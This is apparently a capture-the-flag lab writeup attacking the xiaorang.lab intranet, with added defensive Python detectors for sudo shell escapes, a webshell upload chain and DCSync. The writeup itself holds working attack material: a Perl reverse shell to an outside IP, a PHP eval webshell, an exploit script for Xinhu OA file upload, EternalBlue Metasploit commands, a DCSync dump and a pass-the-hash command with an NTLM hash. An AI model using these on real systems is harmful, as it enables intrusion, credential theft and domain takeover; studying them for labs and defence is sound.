Intranet scanning: GitHub - shadow1ng/fscan: an all-in-one intranet scanning tool for convenient one-click, automated, full-coverage vulnerability scanning.
Intranet proxy: GitHub - ph4ntonn/Stowaway: 👻Stowaway -- Multi-hop Proxy Tool for pentesters
GTFOBins
Proxifier
DCSync
Checking sudo permissions shows that MySQL can be used for privilege escalation
sudo mysql -e '\! /bin/sh' # escalate to root
nc -lvvp 1133
perl -e 'use Socket;$i="124.71.111.64";$p=1133;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
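Added example (not part of the original writeup): the escalation above works because sudo lets a low-privileged user run mysql, and mysql's \! escape spawns a shell (GTFOBins). The Python below audits sudoers-style rules for binaries with a documented shell escape so that a defender can find such rules before they are abused. The sudoers text is constructed sample input, and the binary list is a small hand-picked subset of GTFOBins entries.

```python
"""Audit sudo rules for binaries that GTFOBins documents as having a shell escape."""
import re

# Constructed subset of GTFOBins "sudo" entries; extend from https://gtfobins.github.io/
# for a real audit (assumption: this list is illustrative, not complete).
SHELL_ESCAPE_BINARIES = {
    "mysql", "vim", "vi", "less", "more", "find", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "nmap", "tar", "zip",
}

# Constructed sample /etc/sudoers content for the demonstration (not from a real host).
SAMPLE_SUDOERS = """
# Defaults
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/mysql
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/find
backup  ALL=(root) /usr/bin/rsync
"""

# user  host=(runas) [NOPASSWD:] cmd1, cmd2 ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Yield (user, runas, nopasswd, [commands]) for each user-specification line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        nopasswd = False
        if cmds.startswith("NOPASSWD:"):
            nopasswd = True
            cmds = cmds[len("NOPASSWD:"):]
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        yield m.group("user"), m.group("runas") or "root", nopasswd, commands


def basename(command):
    """Binary name of a sudoers command spec: first token, path stripped."""
    return command.split()[0].rsplit("/", 1)[-1]


def audit(text):
    """Return one finding per rule that grants a binary with a known shell escape."""
    findings = []
    for user, runas, nopasswd, commands in parse_sudoers(text):
        for cmd in commands:
            if cmd == "ALL":
                continue  # unrestricted by design; a policy question, not a bypass
            name = basename(cmd)
            if name in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "user": user, "runas": runas, "binary": name,
                    "nopasswd": nopasswd,
                    "risk": "shell escape documented on GTFOBins",
                })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f)
```

On the sample input the audit flags the www-data rule for mysql and the deploy rule for find, and ignores systemctl and rsync because they are not in the constructed list. Run it against the real `sudo -l` output or `/etc/sudoers` plus `/etc/sudoers.d/*` after extending the binary set.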
First upload fscan
./fscan -h 172.22.1.0/24
Scan results
172.22.1.15 thinkphprce already compromised
172.22.1.21 XIAORANG-WIN7.xiaorang.lab MS17-010
172.22.1.2 DC01
172.22.1.18 XIAORANG-OA01 Xinhu OA (信呼协同办公系统)
Server: ./stowaway_admin -l 1122
Client: ./stowaway_agent -c 124.71.111.64:1122
Server: use 0
Server: socks 1123
Proxy rules
Account: admin
Password: admin123
On the Kali desktop create two files, 1.php and exp.py
1.php:
<?php eval($_POST["1"]);?>
exp.py:
import requests

session = requests.session()
url_pre = 'http://172.22.1.18'

# 1. Login request (adminuser/adminpass are base64-encoded).
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
# 2. File upload endpoint.
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',      # base64("admin")
    'adminpass': 'YWRtaW4xMjM=',  # base64("admin123")
    'yanzm': ''
}
r = session.post(url1, data=data1)

# Upload 1.php in binary mode so the bytes are sent unchanged.
with open('1.php', 'rb') as f:
    r = session.post(url2, files={'file': f})
resp = r.json()
# The server stores the upload as <name>.uptemp; the task below turns it into .php.
filepath = '/' + str(resp['filepath']).split('.uptemp')[0] + '.php'
file_id = resp['id']

# 3. Trigger the qcloudCos|runt task for the uploaded file id.
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)

# 4. Request the renamed .php and print the response (this confirms the backdoor path).
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
Run the script
proxychains python3 exp.py
This gives the path of the backdoor; just connect to it with Godzilla (哥斯拉)
After connecting we are already running as SYSTEM
Check the flag
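As an added example (not part of the original writeup or the Xinhu OA product), the following Python shows what the login → upload → task trigger → webshell sequence sent by exp.py looks like to a defender reading the OA server's access log, and flags any client that completes the chain within a short window. The log lines, client addresses and the upload path are constructed sample data; the request parameters are the ones exp.py sends.

```python
"""Detect the upload -> runt task -> .php request chain in web access logs."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Combined-log-format line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample access log (not real traffic). The first client performs the
# full exp.py sequence; the second only uploads a file and then browses normally.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:01 +0000] "POST /?a=check&m=login&d=&ajaxbool=true&rnd=533953 HTTP/1.1" 200 150
10.0.0.5 - - [10/Oct/2023:13:55:02 +0000] "POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913 HTTP/1.1" 200 320
10.0.0.5 - - [10/Oct/2023:13:55:03 +0000] "GET /task.php?m=qcloudCos%7Crunt&a=run&fileid=42 HTTP/1.1" 200 12
10.0.0.5 - - [10/Oct/2023:13:55:04 +0000] "GET /upload/2023-10/10_1355_42.php?1=system('dir'); HTTP/1.1" 200 880
10.0.0.9 - - [10/Oct/2023:13:57:10 +0000] "POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=1 HTTP/1.1" 200 300
10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /index.php?a=index&m=home HTTP/1.1" 200 4000
"""

# The stages of the chain, in the order they must occur. Paths are URL-decoded
# before matching, so "%7C" in the log matches the "|" in the exploit URL.
STAGES = (
    ("upload", lambda m, p: m == "POST" and "a=upfile" in p and "m=upload" in p),
    ("trigger", lambda m, p: m == "GET" and p.startswith("/task.php")
                and "m=qcloudCos|runt" in p),
    # A GET to a .php file that is not one of the application's entry points.
    ("webshell", lambda m, p: m == "GET" and ".php" in p
                 and not p.startswith(("/index.php", "/task.php", "/?"))),
)


def parse(log_text):
    """Yield (ip, timestamp, method, decoded path) for each parseable log line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            yield m.group("ip"), ts, m.group("method"), unquote(m.group("path"))


def detect(log_text, window=timedelta(minutes=5)):
    """Return one alert per client that completes all stages in order within `window`."""
    progress = {}  # ip -> (index of next expected stage, time of first stage hit)
    alerts = []
    for ip, ts, method, path in parse(log_text):
        idx, start = progress.get(ip, (0, None))
        if start is not None and ts - start > window:
            idx, start = 0, None  # window expired; start the chain over
        _, matcher = STAGES[idx]
        if matcher(method, path):
            start = start or ts
            idx += 1
            if idx == len(STAGES):
                alerts.append({"ip": ip, "first": start.isoformat(),
                               "last": ts.isoformat(), "path": path})
                idx, start = 0, None
        progress[ip] = (idx, start)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

Requiring the stages in order keeps the rule quiet on ordinary uploads (10.0.0.9 above never trips it) while still catching the chain even if the attacker changes the uploaded file name, since only the endpoints and parameters are matched.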
172.22.1.15 thinkphprce already compromised
172.22.1.21 XIAORANG-WIN7.xiaorang.lab MS17-010
172.22.1.2 DC01
172.22.1.18 XIAORANG-OA01 Xinhu OA (信呼协同办公系统) compromised
Next we go after 172.22.1.21
It was found to be vulnerable to EternalBlue, so we go all in with msf
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
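Added example (not part of the original writeup): on the domain controller, a DCSync request such as the kiwi command above is recorded as Security Event ID 4662 carrying the directory-replication control-access-right GUIDs in its Properties field. The Python below reads a constructed JSON-lines export of such events and alerts when any principal other than a domain controller machine account or an allow-listed sync account requests replication. The event records, the DC02$ and svc_adsync names and the jdoe account are constructed; the replication GUIDs are the documented Active Directory values.

```python
"""Flag DCSync-style replication requests in Windows Security Event 4662 records."""
import json
import re

# Control-access-right GUIDs that authorize directory replication (documented AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allow-list (assumption): DC machine accounts plus one directory-sync service account.
ALLOWED_ACCOUNTS = {"DC01$", "DC02$", "svc_adsync"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed JSON-lines export of Security events from DC01 (sample data, not real logs).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 4662, "TimeCreated": "2023-10-10T14:02:11Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "DC02$", "SubjectDomainName": "XIAORANG", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2023-10-10T14:05:40Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "administrator", "SubjectDomainName": "XIAORANG", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2023-10-10T14:06:02Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG", "AccessMask": "0x20",
     "Properties": "Write Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "TimeCreated": "2023-10-10T14:10:00Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "svc_adsync", "SubjectDomainName": "XIAORANG", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TimeCreated": "2023-10-10T14:11:00Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG"},
])


def replication_rights(properties):
    """Names of replication rights whose GUIDs appear in a 4662 Properties field."""
    found = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.append(name)
    return found


def detect_dcsync(jsonl_text, allowed=ALLOWED_ACCOUNTS):
    """Alert on 4662 events where a non-allow-listed principal requested replication."""
    alerts = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary directory access, not a replication request
        account = ev.get("SubjectUserName", "")
        if account in allowed:
            continue  # expected replication partner or sync account
        alerts.append({
            "time": ev.get("TimeCreated"),
            "dc": ev.get("Computer"),
            "account": account,
            "domain": ev.get("SubjectDomainName"),
            "rights": rights,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(a)
```

The rule fires on the administrator request even though the account is privileged: legitimate replication comes from DC machine accounts and known sync services, so an interactive user asking for DS-Replication-Get-Changes-All is the signal. Auditing for 4662 on the domain object has to be enabled via the SACL for this event to exist, and the allow-list should be built from the real DC and sync accounts of the environment.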